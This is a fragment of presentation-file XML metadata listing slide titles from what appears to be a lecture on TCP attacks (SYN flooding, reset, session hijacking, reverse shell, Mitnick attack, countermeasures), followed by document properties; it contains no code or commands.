      <vt:lpstr>TCP Connections, Send/Receive Buffers</vt:lpstr>
      <vt:lpstr>Maintaining Order &amp; Reliability</vt:lpstr>
      <vt:lpstr>Managing Speed:</vt:lpstr>
      <vt:lpstr>TCP Header</vt:lpstr>
      <vt:lpstr>syn flooding attack</vt:lpstr>
      <vt:lpstr>Establishing Connections</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack</vt:lpstr>
      <vt:lpstr>Before the Attack</vt:lpstr>
      <vt:lpstr>Attack In Progress</vt:lpstr>
      <vt:lpstr>Launching SYN Flooding Attacks Using Scapy</vt:lpstr>
      <vt:lpstr>What Makes SYN Flooding Attack Fail (1)</vt:lpstr>
      <vt:lpstr>What Makes SYN Flooding Attack Fail (2)</vt:lpstr>
      <vt:lpstr>What Makes SYN Flooding Attack Fail (3)</vt:lpstr>
      <vt:lpstr>The SYN Cookie Countermeasure</vt:lpstr>
      <vt:lpstr>TCP Reset Attack</vt:lpstr>
      <vt:lpstr>How Do We Finish a Phone Call?</vt:lpstr>
      <vt:lpstr>How to Close TCP Connections?</vt:lpstr>
      <vt:lpstr>TCP Reset Packet</vt:lpstr>
      <vt:lpstr>TCP Reset Attack</vt:lpstr>
      <vt:lpstr>Spoofing Reset Packet</vt:lpstr>
      <vt:lpstr>Constructing Reset Packet</vt:lpstr>
      <vt:lpstr>TCP Rest Attack: Sample Code</vt:lpstr>
      <vt:lpstr>TCP Reset Attack on Video Streaming</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking Attack</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking</vt:lpstr>
      <vt:lpstr>Finding Sequence Number</vt:lpstr>
      <vt:lpstr>About Sequence Number</vt:lpstr>
      <vt:lpstr>Session Hijacking: Manual Spoofing</vt:lpstr>
      <vt:lpstr>Session Hijacking: Automatic Spoofing</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>What Happens to The Session?</vt:lpstr>
      <vt:lpstr>Mitnick attack</vt:lpstr>
      <vt:lpstr>The Story (1994 and 1995) </vt:lpstr>
      <vt:lpstr>Mitnick Attack: Technical Details</vt:lpstr>
      <vt:lpstr>A Simplified Mitnick Attack</vt:lpstr>
      <vt:lpstr>Spoofing SYN Packet</vt:lpstr>
      <vt:lpstr>Shutdown the Client: Emulation</vt:lpstr>
      <vt:lpstr>Spoofing ACK and Data (1)</vt:lpstr>
      <vt:lpstr>Spoofing ACK and Data (2)</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Countermeasures </vt:lpstr>
      <vt:lpstr>Randomization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Heartbleed Bug and Attack</dc:title>
  <dc:creator>3shna</dc:creator>
  <cp:lastModifiedBy>Wenliang Du</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-22T15:54:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-09T21:59:10Z</dcterms:modified>
</cp:coreProperties>
</file>